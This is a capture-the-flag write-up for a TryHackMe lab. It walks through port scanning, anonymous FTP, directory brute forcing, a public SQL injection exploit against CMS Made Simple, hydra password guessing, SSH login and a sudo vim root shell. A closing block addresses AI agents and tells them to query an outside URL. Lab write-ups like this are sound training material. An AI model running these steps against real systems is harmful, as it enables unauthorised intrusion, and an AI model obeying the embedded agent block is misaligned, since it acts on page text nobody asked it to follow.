# Simple CTF

![](/files/-MajV3ZM7FLoQLE3SLaL)

## Reconnaissance

Lets start with a initial nmap scan to find open ports&#x20;

```
nmap -Pn 10.10.221.224
```

![](/files/-MajVYmfwpjY48WPhlkM)

Detailed Nmap Scan :&#x20;

Command Breakdown:&#x20;

* (**-sV):** Service version
* (**-sC**): Default nmap scripts
* (**-p):** Specifying ports 21,80,2222
* (**-oN nmap**): Saving it into a files called nmap

```
nmap -sC -sV -p 21,80,2222 -oN nmap 10.10.221.224
```

![](/files/-MajWLp6S42VEc9pIHH-)

With this information we can answer the first 2 questions&#x20;

![](/files/-MajWZGEpTd-5rUeqcm0)

## Enumeration

### Port 21

Lets start enumerating FTP (Port 21) as we have anonymous login allowed.

```
ftp 10.10.221.224 
```

![](/files/-MajXAaniHyIOaybPbOl)

After listing the contents, we can see that there is a directory called `pub`and inside is a file called `ForMitch.txt`. Let us transfer that to our machine using the command `get`.

```
get ForMitch.txt
```

![](/files/-MajXbcxv2N5u2aPWsFe)

After reading the contents of the file we transferred, we can understand that Mitch set the password for the system user and the password is weak.

```
cat ForMitch.txt
```

![](/files/-MajY8pHNOuHcQAxgjsp)

### Port 80

Lets visit the website.

![](/files/-MajYelbyS4MT1UDj-7q)

It a default apache2 ubuntu page, so let us visit robots.txt as we see something of interest related to it in our nmap scan.

![](/files/-MajYyEebxA7K8hHbhIs)

We can see that there is a directory called `/openemr-5_0_1_3`, lets go visit it.

![](/files/-MajZFg04t4lrN0SnkOw)

And is not found, well, now lets try finding hidden directories using a tool called **`Gobuster`.**

Command Breakdown:&#x20;

* (**-w**): Specifying wordlist&#x20;
* (**-u**): Specifying URL

```
gobuster dir -w /usr/share/wordlists/dirbuster/common.txt -u http://10.10.221.224
```

![](/files/-Maj_JJ5-4p1YRTc-uNl)

The directory called `/simple` looks interesting, so lets go visit it.

![](/files/-Maj_T1c8SlM3ijczgCD)

Its a CMS made simple application and scrolling down a bit, we can see the version of it.

![](/files/-Maj_hasZ0yeDGBEyoxe)

Lets look for exploits on it using searchsploit

```
searchsploit cms made simple 2.2.8
```

![](/files/-Maj_vwisAEdZywjUuID)

Looks like a SQL Injection exploit, lets use this to exploit this machine.

## Exploitation

Searching this on exploit-db gives us the answers to questions 3 and 4

![](/files/-MajaTHZGuDd338PXd27)

![](/files/-Maja_d-6MR0zd85Lxgz)

Lets download the exploit.

```
searchsploit -m php/webapps/46635.py
```

![](/files/-MajaiykBm1gqPgZKYpq)

Now lets launch it against the server, but first we need to do some changes to the script as we are going to use python3 to launch this exploit. First we need to add parenthesis around the print commands

Before:&#x20;

![](/files/-MajbeyEYPgN0AYpJXqZ)

After:&#x20;

![](/files/-MajcPZQKK2ubA0cZz23)

Before:&#x20;

![](/files/-MajcY1L2593FSitO0Ut)

After:&#x20;

![](/files/-MajcdSs6gvZNYVxPA8H)

Before:&#x20;

![](/files/-MajclNpXs5CpYX5Zqwb)

After:&#x20;

![](/files/-MajcrKRowka5LdXrR2B)

Now we can run the exploit with some options, like the target URL (-u), a wordlists to crack the password (-w) and the option for telling the exploit to crack the password (-c), all mentioned in the exploit.

![](/files/-MajdMHsZHeYVamj56Nk)

```
python3 46635.py -u http://10.10.221.224/simple -w /usr/share/wordlists/rockyou.txt -c
```

![](/files/-Maji1qcg9I94k8dWiat)

We found the password: `secret`. Sometimes this exploit does not work, so we can also try cracking the password using the tool called hydra.

```
hydra -l mitch -P /usr/share/wordlists/rockyou.txt 10.10.221.224 http-post-form "/simple/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:User name or password incorrect"
```

![](/files/-MajjP1bAr6ZYLzBoJQe)

And now we can ssh into the machine using these credentials.

```
ssh mitch@10.10.221.224 -p 2222
```

![](/files/-Majk30cs2c0ZYleA_eo)

## Privilege Escalation

For privilege escalation, one of the first commands we use is `sudo -l`, which tells us what we are allowed to run on the machine.

```
sudo -l
```

![](/files/-MajknmqauQRjtyzOYiS)

We are allowed to run /usr/bin/vim as root, so what we can do is visit [GTFOBins](https://gtfobins.github.io/) which is a site with commands that will help us escalate our privileges.

Search for vim on the site and look for sudo as we are allowed to run /usr/bin/vim as root.

After you type the first command, you are now root.

![](/files/-MajlnM3_hr-GR754jYk)

```
sudo vim -c ':!/bin/sh'
```

![](/files/-MajluZmhcO-eb7TgeR9)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://writeups.adityadindi.com/tryhackme/untitled/simple-ctf.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.